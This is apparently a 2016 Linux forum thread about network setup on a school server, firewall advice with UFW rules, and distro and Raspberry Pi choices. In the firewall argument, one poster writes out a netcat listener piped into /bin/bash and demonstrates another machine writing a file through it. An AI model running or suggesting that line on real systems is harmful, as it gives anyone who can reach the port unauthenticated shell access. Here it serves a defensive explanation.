General Linux Chat and Small Questions v. Year of the Linux Desktop! - Hardware & Software

[QUOTE=Anderen2;50717062]Are you running a Webserver on the same server as you now want to configure Postfix on? If so, that does not change much, you could (and should) still route the traffic through the firewall and port forward/open the necessary ports. Running a server (no matter what platform) with no firewall directly on a external line is very bad practice.[/QUOTE] yes. there's already a website running under the firewall. it's not running any services open to the outside, i've port scanned it

[QUOTE=Giraffen93;50717077]yes. there's already a website running under the firewall. it's not running any services open to the outside, i've port scanned it[/QUOTE] That's due to there being no other services running. If there is no firewall in front then you are very vulnerable towards zero-day attacks, malware, and other funny stuff. Try running (really, don't) [code]nc -l *enter external IP here* 1337 | /bin/bash[/code] Also, it's saying its not configured right, or the configuration has changed since you brought the interface up. Try: [code]sudo ip link set eth2 down[/code]

by the way i know for a fact that windows can do this, as one of our other servers has both an internal ip address and an external one and it's working just fine [QUOTE=Anderen2;50717111]That's due to there being no other services running. If there is no firewall in front then you are very vulnerable towards zero-day attacks, malware, and other funny stuff. Try running (really, don't) [code]nc -l *enter external IP here* 1337 | /bin/bash[/code] Also, it's saying its not configured right, or the configuration has changed since you brought the interface up. Try: [code]sudo ip link set eth2 down[/code][/QUOTE] i'll look into software firewalling, but i'm not sure i'm gonna get anywhere isn't ifdown the same thing? is it a second layer thing? that worked, but it's still in the list, guess that's good enough?

[QUOTE=Giraffen93;50717139]by the way i know for a fact that windows can do this, as one of our other servers has both an internal ip address and an external one and it's working just fine isn't ifdown the same thing? is it a second layer thing? that worked, but it's still in the list, guess that's good enough?[/QUOTE] Every OS may have lots of NIC's in several different networks, the key word here is different. If the network configuration has two NIC's pointed to the same network, well then I do not know what happens, likely it just does not work. How is your config looking now by the way? Could you add the gateway line back to eth1, and then run "ifdown eth1 && ifup eth1"? Also, please post the output of the commands I listed at the previous page again afterwards (You could leave out the output for ip link, it was not that exciting).

[img]http://rp.braxnet.org/scr/146862042772592.png[/img] fun times, even did the ip link set down thing the "file exists" error is extra hilarious due to how useless it is

[QUOTE=Giraffen93;50717204][img]http://rp.braxnet.org/scr/146862042772592.png[/img] fun times, even did the ip link set down thing the "file exists" error is extra hilarious due to how useless it is[/QUOTE] Haha, I cannot disagree there. It has to do with how everything in Linux is a file, and I guess what it's trying to tell you is that the connection to the network is already established. I would guess that some kind of conflict occurred when you had both of the NIC's on the same network with the gateway. It's night now in Sweden, and if your site is not required to serve 24/7 then I would recommend you to do a quick maintenance window by fixing the network configuration and then rebooting the server to wipe away any bogus network state. Just remove all references to eth2 (or atleast the ipaddress, netmask and gateway), set eth0 and eth1 up properly, and post the config here before rebooting. If rebooting is out of the option, then fixing it is not impossible, it would probably just take time to figure out what kind of state which is bogus over a forum.

[QUOTE=Anderen2;50717272]Haha, I cannot disagree there. It has to do with how everything in Linux is a file, and I guess what it's trying to tell you is that the connection to the network is already established. I would guess that some kind of conflict occurred when you had both of the NIC's on the same network with the gateway. It's night now in Sweden, and if your site is not required to serve 24/7 then I would recommend you to do a quick maintenance window by fixing the network configuration and then rebooting the server to wipe away any bogus network state. Just remove all references to eth2 (or atleast the ipaddress, netmask and gateway), set eth0 and eth1 up properly, and post the config here before rebooting. If rebooting is out of the option, then fixing it is not impossible, it would probably just take time to figure out what kind of state which is bogus over a forum.[/QUOTE] i'm not gonna risk rebooting it and having it offline until on monday when i get there, that's gonna have to happen then eth0 [I]needs[/I] to stay up, or eth1 if i can bother connecting to the vpn on the other server

[QUOTE=Giraffen93;50717300]i'm not gonna risk rebooting it and having it offline until on monday when i get there, that's gonna have to happen then eth0 [I]needs[/I] to stay up, or eth1 if i can bother connecting to the vpn on the other server[/QUOTE] I understand, however if this server is mission critical then I would advise that we'd stop messing with it until you are able to fix it on-site, in-case something breaks, reboot or not. I would recommend that you'd look into enabling and configuring ILO or iDRAC in the future (assuming that this is running on server hardware), such that you may fix stuff while not on site. Also, as far as I can see (assuming that the network settings are correct), then fixing the config, removing eth2 and rebooting should make it work. Final remark, please look into getting the server behind a firewall. Too many servers has been sieged while in a setup like yours due to reasons mentioned. Atleast if the mails going through it, and the web traffic could contain sensitive information.

[QUOTE=Anderen2;50717346]I understand, however if this server is mission critical then I would advise that we'd stop messing with it until you are able to fix it on-site, in-case something breaks, reboot or not. I would recommend that you'd look into enabling and configuring ILO or iDRAC in the future (assuming that this is running on server hardware), such that you may fix stuff while not on site. Also, as far as I can see (assuming that the network settings are correct), then fixing the config, removing eth2 and rebooting should make it work. Final remark, please look into getting the server behind a firewall. Too many servers has been sieged while in a setup like yours due to reasons mentioned. Atleast if the mails going through it, and the web traffic could contain sensitive information.[/QUOTE] we have no real server hardware anywhere, wouldn't be able to afford it :v: (this is a non-profit school) so looking up how to block everything but port 22, 80 and 443 then? still, there's nothing else running, i don't see how blocking would help

what kind of company has a budget of less than $100 furthermore who let you have administrative access to the company server [editline]15th July 2016[/editline] [QUOTE=Giraffen93;50717414]we have no real server hardware anywhere, wouldn't be able to afford it :v: (this is a non-profit school)[/QUOTE] ah

[QUOTE=Dr. Evilcop;50717424]what kind of company has a budget of less than $100 furthermore who let you have administrative access to the company server[/QUOTE] priorities. and our large ups broke yesterday too so that needs replacing, it's all these small costs i've got contacts, and you gotta start somewhere right? nobody is born with all the knowledge

[QUOTE=Giraffen93;50717414]we have no real server hardware anywhere, wouldn't be able to afford it :v: (this is a non-profit school) so looking up how to block everything but port 22, 80 and 443 then? still, there's nothing else running, i don't see how blocking would help[/QUOTE] Firewall is not there to block services running there already (Windows is an exception), it's there to ensure that no new and unwanted ones suddenly start working. You said that the server ran a webserver, I'm assuming that this may run some kind of dynamic content? (and even if it does not then zero-days pop up all the time) Also, I guess that you do not code-review all the software that gets installed on the server? If one of the statements above are true, then you should use a firewall. Say someone does something stupid on your network, and the server gets infected. Instead of containing the infection there, attackers may get additional access simply by making the malware execute the simple line I posted earlier (Or tons of even more fun lines). Case in point: [code] Personal computer anderen2@e7440:~$ cd /tmp anderen2@e7440:/tmp$ echo "Hello world!" > importantfile anderen2@e7440:/tmp$ ls importantfile importantfile anderen2@e7440:/tmp$ cat importantfile Hello world! anderen2@e7440:/tmp$ nc -l 192.168.0.11 1337 | /bin/bash ^C anderen2@e7440:/tmp$ cat importantfile Woops Other computer (Note that there were no questions for username/password, I simply knew the IP address and that it was vulnerable) anderen2@proliant01:~$ nc 192.168.0.11 1337 echo "Woops" > /tmp/importantfile [/code] [editline]16th July 2016[/editline] [QUOTE=Giraffen93;50717492]priorities. and our large ups broke yesterday too so that needs replacing, it's all these small costs i've got contacts, and you gotta start somewhere right? nobody is born with all the knowledge[/QUOTE] No shame in starting small, we've all been there :)

Just great. Now im getting read error when i boot to ubuntu. How do i fix it?

[QUOTE=EddieLTU;50720827]Just great. Now im getting read error when i boot to ubuntu. How do i fix it?[/QUOTE] You really need to start being more descriptive :v: What read error, exactly?

[QUOTE=Giraffen93;50717414]we have no real server hardware anywhere, wouldn't be able to afford it :v: (this is a non-profit school) so looking up how to block everything but port 22, 80 and 443 then? still, there's nothing else running, i don't see how blocking would help[/QUOTE] UFW would be a good first step. It's built right into Ubuntu and is incredibly easy to use. [code] ufw allow ssh ufw allow http ufw allow https ufw allow 53 ufw enable ufw policy deny [/code] You could even restrict by IP. [code] ufw allow from 129.221.0.0/16 to any port 22 [/code]

[QUOTE=Dr. Evilcop;50720864]You really need to start being more descriptive :v: What read error, exactly?[/QUOTE] nevermind, i broke the heat sink for that pc, so i aint booting in for a long time

So I'm a complete novice to Linux but I'm a software developer who's been using C and C++ for over a decade. I want to get into developing on Linux and getting a good understanding for using it as a desktop OS on my laptop - this means I want to learn a load of Linux stuff, but I also want to actually be able to do shit without spending hours troubleshooting everything I want to do. So given that, what distro would you recommend? I had a look on the Ubuntu site and they're pushing all this crap about cloud stuff which doesn't appeal to me at all. edit: I'm currently leaning towards Mint, my only reservation is whether it might be a bit too easy and stop me from learning so much?

[QUOTE=Jallen;50722432]So I'm a complete novice to Linux but I'm a software developer who's been using C and C++ for over a decade. I want to get into developing on Linux and getting a good understanding for using it as a desktop OS on my laptop - this means I want to learn a load of Linux stuff, but I also want to actually be able to do shit without spending hours troubleshooting everything I want to do. So given that, what distro would you recommend? I had a look on the Ubuntu site and they're pushing all this crap about cloud stuff which doesn't appeal to me at all. edit: I'm currently leaning towards Mint, my only reservation is whether it might be a bit too easy and stop me from learning so much?[/QUOTE] In my experience Arch Linux is way better for programming than any of the Ubuntu-based distros. My suggestion would be to do an Arch virtual machine. You'll have minimal troubleshooting to do since it's pretty well documented how to setup Arch for VirtualBox, and you'll get the full benefits of that sweet sweet Pacman. Once you've learned a bunch about Linux, you could consider dual booting with Arch.

I was considering Arch but I initially shied away from it as I got the impression that I would be swamped with too much stuff I don't understand. Maybe I should get a book or something, I'm going in really quite blind.

[QUOTE=Jallen;50722588]I was considering Arch but I initially shied away from it as I got the impression that I would be swamped with too much stuff I don't understand. Maybe I should get a book or something, I'm going in really quite blind.[/QUOTE] No need for a book, the Arch wiki is very thorough and very accessible. Check out the [URL="https://wiki.archlinux.org/index.php/beginners'_guide"]beginner's guide[/URL]. Generally people arent recommended Arch because most people are scared of a command line, but as a programmer I expect you'll be just fine. It's actually not that complicated, and the risk of failure inside a virtual machine is practically nil other than your time. There are Arch-based distros that provide an installer, but installing Arch is a very valuable learning experience that you shouldn't pass up. I wouldn't worry about getting swamped with new knowledge unless you try to install Gentoo instead :v:

[QUOTE=Jallen;50722588]I was considering Arch but I initially shied away from it as I got the impression that I would be swamped with too much stuff I don't understand. Maybe I should get a book or something, I'm going in really quite blind.[/QUOTE] Arch is pretty nice after you push through the installer. Its difficulty afterwards depends entirely on what you wind up doing with it, but the difference between it and say, Ubuntu is that the arch wiki is pretty much the best documentation for any distro I've ever come across, so if you do try to do some advanced things, it's there to help. If you just install say, GNOME and then the stuff you use for programming you won't have those hours of troubleshooting. There's also Debian and Fedora which are pretty approachable distros that don't quite get in your way like Mint or Ubuntu. They have nice installers that get you going (both have full disk encryption, since you have a laptop I hope you use it!)

I dunno if this applies to debian but my problem with Ubuntu and its package manager apt-get is it just doesn't work for half the development libraries I tried to use. E.g. I'd install the developer package for libSDL, then go to link it, but it just didn't work and now I have to go grab it from SDL's website. Furthermore, shit is constantly way outdated in the Ubuntu repos. Arch and pacman/pacaur have been very good to me in that regard.

Fedora is pretty good for being up-to-date, and you can create your own packages if necessary on [URL="https://copr.fedorainfracloud.org/"]COPR[/URL]/[URL="https://build.opensuse.org/"]OBS[/URL]

[QUOTE=Adam.GameDev;50722888]Fedora is pretty good for being up-to-date, and you can create your own packages if necessary on [URL="https://copr.fedorainfracloud.org/"]COPR[/URL]/[URL="https://build.opensuse.org/"]OBS[/URL][/QUOTE] Same deal with Ubuntu and PPA's on Launchpad.

I know I can create my own packages but I don't see why I'd bother since I've gotta go grab the source from SDL's website either way :v: It's nice to have it just ready to go in the official repos/AUR like in Arch.

[QUOTE=Van-man;50722895]Same deal with Ubuntu and PPA's on Launchpad.[/QUOTE] Does Debian have anything similar for itself?

[QUOTE=Adam.GameDev;50722921]Does Debian have anything similar for itself?[/QUOTE] Only unofficial repositories (PPA's are actually easymode installers for Launchpad repositories) Example of such Debian repo 'installing': [url]https://www.dotdeb.org/instructions/[/url]

i got my raspberry pi 3, and it's pretty neat. But the pi 3 is a little weird. It's a 64 bit ARMV8 buuuuuut every distro you download is still 32 bit, because apparently broadcom are kind of cunts? Though, it's still a pretty cool little thing. I got a case, charger, 32GB ld microsd, and heatsinks with it too. 64 bit should be available eventually probably which'll be cool. I think I can get the void musl libc version running on it though, and then I'll be happy, with wayland too! For mainstream distros I think it's mostly debian/ubuntu that have pi images and I can't really stand apt (don't lynch me.) I could also get arch I think.

[QUOTE=thelurker1234;50723827]i got my raspberry pi 3, and it's pretty neat. But the pi 3 is a little weird. It's a 64 bit ARMV8 buuuuuut every distro you download is still 32 bit, because apparently broadcom are kind of cunts? Though, it's still a pretty cool little thing. I got a case, charger, 32GB ld microsd, and heatsinks with it too. 64 bit should be available eventually probably which'll be cool. I think I can get the void musl libc version running on it though, and then I'll be happy, with wayland too! For mainstream distros I think it's mostly debian/ubuntu that have pi images and I can't really stand apt (don't lynch me.) I could also get arch I think.[/QUOTE] IIRC the Raspbian distro is 64 bit. But yeah, the RPi's non-standard CPU and GPU are the bain of my existence. Anything not officially supported takes some ugly hacks to get working, especially when it comes to GPU accelerated stuff. I much prefer the ODROID C2 since it has a faster processor, a much better GPU (which supports 4k), twice the RAM, an MMC port for fast SSD storage, and the processor and gpu are much more generic/standard for what you see in consumer ARM computers, so it's much easier to work with. Android runs very well on the C2 without any hacky bullshit, and you can use hardware acceleration in various browsers rather than just epiphany, for example. It also comes out to roughly the same price, maybe $5 more if you need a wifi adapter for it. The only real problem is it doesn't have the same level of community as the RPi, but I don't think that's a huge issue for what a lot of people buy RPi's for (running emulators, small server tasks like an FTP, being a media center, etc).

[QUOTE=thelurker1234;50723827]i got my raspberry pi 3, and it's pretty neat. But the pi 3 is a little weird. It's a 64 bit ARMV8 buuuuuut every distro you download is still 32 bit, because apparently broadcom are kind of cunts? Though, it's still a pretty cool little thing. I got a case, charger, 32GB ld microsd, and heatsinks with it too. 64 bit should be available eventually probably which'll be cool. I think I can get the void musl libc version running on it though, and then I'll be happy, with wayland too! For mainstream distros I think it's mostly debian/ubuntu that have pi images and I can't really stand apt (don't lynch me.) I could also get arch I think.[/QUOTE] openSUSE Leap has an aarch64 port, but I can't find anything about openSUSE supporting anything newer than the Pi 2